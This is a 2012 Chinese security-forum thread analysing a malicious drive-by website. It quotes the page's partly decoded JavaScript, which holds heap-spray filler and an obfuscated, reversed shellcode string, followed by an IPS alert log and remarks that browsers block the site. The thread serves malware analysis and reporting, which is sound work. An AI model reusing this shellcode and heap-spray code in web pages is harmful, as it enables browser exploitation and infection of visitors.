http://undwvjwbni.kostobravo.com/……【挂马，部分未解 by 阿狸】

显示全部楼层 · 发表于 2012-12-18 16:19:53

本帖最后由 wjhstu-VxG 于 2012-12-18 21:51 编辑

样本截图在隔壁 http://bbs.kafan.cn/thread-1430768-1-1.html

显示全部楼层 · 发表于 2012-12-18 16:30:40

function getFillBytes(){var a='%u'+'0c0c';return a+a}function getShellCode(){var a="8282!%5164!%0454!%74e0!%0451!%e025!%9134!%a451!%b1e0!%21b1!%9154!%f521!%21a1!%b1b1!%e421!%2191!%b191!%e521!%21a1!%b191!%2421!%2191!%9114!%d451!%e0b4!%91e4!%4421!%2191!%91f4!%6421!%2191!%9114!%e451!%71f4!%0485!%6085!%64c5!%54d4!%b504!%4414!%94a4!%b5c5!%50d4!%b5d4!%0474!%70b4!%d4b5!%44d5!%e594!%5470!%b474!%7460!%94e5!%a4a5!%c574!%74b5!%6034!%6414!%f5a4!%e524!%c4f5!%d564!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%df08!%9ecf!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");return a["replace"](/\%!/g,"%"+"u")

复制代码

不搞了，累死了……先去看php了……

显示全部楼层 · 发表于 2012-12-18 16:43:25

wjhstu-VxG 发表于 2012-12-18 16:30
不搞了，累死了……先去看php了……

还有哦

显示全部楼层 · 发表于 2012-12-18 17:55:40

火狐提示我没有java runtime environment 不过google库有黑名单

显示全部楼层 · 发表于 2012-12-18 19:53:50

NIS2013 ips

类别：入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明,类别
2012/12/18 19:52:00,高,阻止了 undwvjwbni.kostobravo.com 的入侵企图,已阻止,不需要操作,Web Attack: Malicious Toolkit Website 9,不需要操作,不需要操作,"undwvjwbni.kostobravo.com (199.241.190.67, 80)",undwvjwbni.kostobravo.com/values/chose-establishment.php,"-PC (115.62, 6562)",199.241.190.67 (199.241.190.67),"TCP, www-http",

显示全部楼层 · 发表于 2012-12-18 20:11:55

wjcharles 发表于 2012-12-18 19:53
NIS2013 ips

类别：入侵防护

IE已经拦截了

巨硬也会入库

[已鉴定] http://undwvjwbni.kostobravo.com/……【挂马，部分未解 by 阿狸】

评分